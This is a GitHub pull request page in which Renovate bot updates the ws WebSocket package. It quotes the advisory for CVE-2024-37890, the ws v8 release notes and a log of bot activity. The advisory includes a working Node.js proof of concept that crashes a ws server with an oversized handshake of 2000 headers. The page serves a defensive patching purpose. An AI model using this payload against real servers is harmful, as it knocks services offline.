
chore(deps): update dependency ws to v8 [security] #7595

Open: wants to merge 1 commit into develop from renovate/npm-ws-vulnerability

Conversation

@live-github-bot live-github-bot bot commented Aug 13, 2024

This PR contains the following updates:

Package   Type              Update   Change
ws        devDependencies   major    7 -> 8
ws        dependencies      minor    8.17.1 -> 8.18.0

GitHub Vulnerability Alerts

CVE-2024-37890

Impact

A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

// Start a ws server on an ephemeral port; the callback runs once it is listening.
const wss = new WebSocket.Server({ port: 0 }, function () {
  // Characters allowed in an HTTP header name; pairs of them give 2000 distinct names.
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  // The upgrade headers come after the 2000 filler headers, so they fall
  // beyond Node's default server.maxHeadersCount of 2000.
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  // Send the oversized handshake request to the local server.
  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in [email protected] (websockets/ws@e55e510) and backported to [email protected] (websockets/ws@22c2876), [email protected] (websockets/ws@eeb76d3), and [email protected] (websockets/ws@4abd8f6)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
  2. Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.


Release Notes

websockets/ws (ws)

v8.0.0

Breaking changes

  • The WebSocket constructor now throws a SyntaxError if any of the
    subprotocol names are invalid or duplicated (0aecf0c).

  • The server now aborts the opening handshake if an invalid
    Sec-WebSocket-Protocol header field value is received (1877dde).

  • The protocols argument of handleProtocols hook is no longer an Array but
    a Set (1877dde).

  • The opening handshake is now aborted if the Sec-WebSocket-Extensions header
    field value is empty or it begins or ends with a white space (e814110).

  • Dropped support for Node.js < 10.0.0 (552b506).

  • The WebSocket constructor now throws a SyntaxError if the connection URL
    contains a fragment identifier or if the URL's protocol is not one of 'ws:',
    'wss:', or 'ws+unix:' (ebea038).

  • Text messages and close reasons are no longer decoded to strings. They are
    passed as Buffers to the listeners of their respective events. The listeners
    of the 'message' event now take a boolean argument specifying whether or not
    the message is binary (e173423).

    Existing code can be migrated by decoding the buffer explicitly.

    websocket.on('message', function message(data, isBinary) {
      const message = isBinary ? data : data.toString();
      // Continue as before.
    });

    websocket.on('close', function close(code, data) {
      const reason = data.toString();
      // Continue as before.
    });

  • The package now uses an ES module wrapper (78adf5f).

  • WebSocketServer.prototype.close() no longer closes existing connections
    (df7de57).

    Existing code can be migrated by closing the connections manually.

    websocketServer.close();
    for (const ws of websocketServer.clients) {
      ws.terminate();
    }

  • The callback of WebSocketServer.prototype.close() is now called with an
    error if the server is already closed (abde9cf).

  • WebSocket.prototype.addEventListener() is now a noop if the type argument
    is not one of 'close', 'error', 'message', or 'open' (9558ed1).

  • WebSocket.prototype.removeEventListener() now only removes listeners added
    with WebSocket.prototype.addEventListener() and only one at time (ea95d9c).

  • The value of the onclose, onerror, onmessage, and onopen properties is
    now null if the respective event handler is not set (6756cf5).

  • The OpenEvent class has been removed (21e6500).

Bug fixes

  • The event listeners added via handler properties are now independent from the
    event listeners added with WebSocket.prototype.addEventListener()
    (0b21c03).

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Paris, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

vercel bot commented Aug 13, 2024

The latest updates on your projects. Learn more about Vercel for Git ↗︎

5 Skipped Deployments

Name                     Status       Preview         Comments   Updated (UTC)
ledger-live-docs         ⬜️ Ignored   Visit Preview              Dec 13, 2024 11:09pm
ledger-live-github-bot   ⬜️ Ignored   Visit Preview              Dec 13, 2024 11:09pm
native-ui-storybook      ⬜️ Ignored   Visit Preview              Dec 13, 2024 11:09pm
react-ui-storybook       ⬜️ Ignored   Visit Preview              Dec 13, 2024 11:09pm
web-tools                ⬜️ Ignored   Visit Preview              Dec 13, 2024 11:09pm

socket-security bot commented Aug 13, 2024

Removed dependencies detected. Learn more about Socket for GitHub ↗︎

🚮 Removed packages: npm/[email protected]

View full report↗︎

@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 87f790d to a2e74a9 Compare August 14, 2024 22:06
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from a2e74a9 to b37c1c5 Compare August 14, 2024 22:14
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from b37c1c5 to 3bc15be Compare August 14, 2024 22:25
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 3bc15be to 2819415 Compare August 14, 2024 22:34
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 2819415 to 412337d Compare August 14, 2024 22:42
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 412337d to 63cba8c Compare August 14, 2024 22:48
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 63cba8c to 944b294 Compare August 14, 2024 22:55
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 944b294 to 689a0ce Compare August 14, 2024 23:01
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 689a0ce to da11ebc Compare August 15, 2024 22:05
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from da11ebc to 4f03efb Compare August 15, 2024 22:14
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 4f03efb to dfc427a Compare August 15, 2024 22:25
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 12, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from be8c5e0 to 1b8e488 Compare December 12, 2024 22:54
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 12, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 1b8e488 to ff47f2c Compare December 12, 2024 23:01
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 12, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from ff47f2c to 43b737f Compare December 12, 2024 23:10
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 12, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 43b737f to a33e3a9 Compare December 13, 2024 22:06
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from a33e3a9 to f076750 Compare December 13, 2024 22:15
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from f076750 to 6cc7038 Compare December 13, 2024 22:28
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 6cc7038 to 912bd0b Compare December 13, 2024 22:38
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 912bd0b to dbdf2b7 Compare December 13, 2024 22:47
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from dbdf2b7 to 6c33580 Compare December 13, 2024 22:53
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 6c33580 to d7190c1 Compare December 13, 2024 23:00
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from d7190c1 to c0c3db7 Compare December 13, 2024 23:08
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 13, 2024